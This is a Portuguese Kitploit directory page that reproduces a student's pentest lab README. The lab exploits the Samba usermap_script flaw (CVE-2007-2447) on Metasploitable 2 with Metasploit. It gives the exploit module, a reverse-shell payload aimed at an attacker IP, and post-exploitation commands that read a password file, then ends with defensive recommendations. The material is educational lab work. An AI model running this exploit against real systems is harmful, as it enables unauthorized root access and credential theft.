Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2 — Laboratório de testes de penetração passo a passo explorando o Samba CVE-2007-2447 no Metasploitable 2 usando Metasploit, demonstrando comprometimento de root, roubo de credenciais e exfiltração de dados para treinamento educacional de red team. | Kitploit
Ferramentas/GitHubGitHub/devinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExfiltração de DadosPós-ExploraçãoTestes de PenetraçãoComando e ControleAprendizado e EducaçãoLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubdevinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2

SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2

Laboratório de testes de penetração passo a passo explorando o Samba CVE-2007-2447 no Metasploitable 2 usando Metasploit, demonstrando comprometimento de root, roubo de credenciais e exfiltração de dados para treinamento educacional de red team.

Ver Repositório
4há 1 anoAinda não revisado

SMB-PenTest-Explorando-CVE-2007-2447-no-Metasploitable-2

RedTeam-SMB-PenTest

linux bash

Descrição


Este projeto documenta meu engajamento de teste de penetração como parte do curso CMIT 386 na UMGC. Ele foca na exploração da vulnerabilidade usermap_script do Samba SMB (CVE-2007-2447) no Metasploitable 2 usando o Metasploit a partir de uma VM de ataque Kali Linux. Esta prova de conceito mostra como uma vulnerabilidade legada pode levar ao comprometimento total do sistema, roubo de credenciais e exfiltração de dados.

Visão Geral da Vulnerabilidade

A vulnerabilidade reside no serviço Samba na porta 445, onde o tratamento inadequado de entrada no script de mapeamento de nomes de usuário permite a execução remota de comandos sem autenticação. Isso fornece aos atacantes acesso a um shell de nível root se explorado.

Ambiente

Passos a seguir

1. Iniciar o Metasploit:

root@kitploit:~
msfconsole


Certifique-se de que tanto o host atacante quanto a máquina vítima estejam inicializados e em execução.

2. Procurar pelo exploit:

root@kitploit:~
search samba

3. Usar o módulo apropriado:

root@kitploit:~
use exploit/multi/samba/usermap_script

4. Definir opções necessárias:

root@kitploit:~
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse

5. Executar o exploit:

root@kitploit:~
exploit

6. Comandos pós-exploração:

root@kitploit:~
whoami
hostname
cd /redteam7/student3
cat mypass.txt

Instruções de Reset

Se a sessão travar ou quebrar:

Reset do Metasploit:

root@kitploit:~
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K             
jobs -K
# Restart Metasploit
msfconsole              

Principais Conclusões

  • Serviços legados como o Samba 3.0.20 com usermap_script são altamente vulneráveis.
  • Explorar essa vulnerabilidade SMB concede acesso a shell root.
  • Dados críticos podem ser coletados com comandos simples, demonstrando risco no mundo real.
  • Isso prova a necessidade de aplicar patches, segmentação e reduzir a exposição de serviços.

Recomendações

  • Aplique patches ou descomissione sistemas legados imediatamente.
  • Implemente segmentação de rede rigorosa e regras de firewall.
  • Limite a exposição do SMB apenas a usuários internos e autenticados.
  • Monitore logs para atividades suspeitas e movimentação lateral.

Referências

  • Metasploit Samba usermap_script
  • CVE-2007-2447 Detalhes
  • Índice de Exploits do Metasploitable 2
Baixar ferramenta
ComponenteDetalhes
Atacante VMKali Linux
Vítima VMMetasploitable 2
Porta Alvo445 (Samba/SMB)
Exploit Usadoexploit/multi/samba/usermap_script
Alvo de Credenciais/redteam7/student3/mypass.txt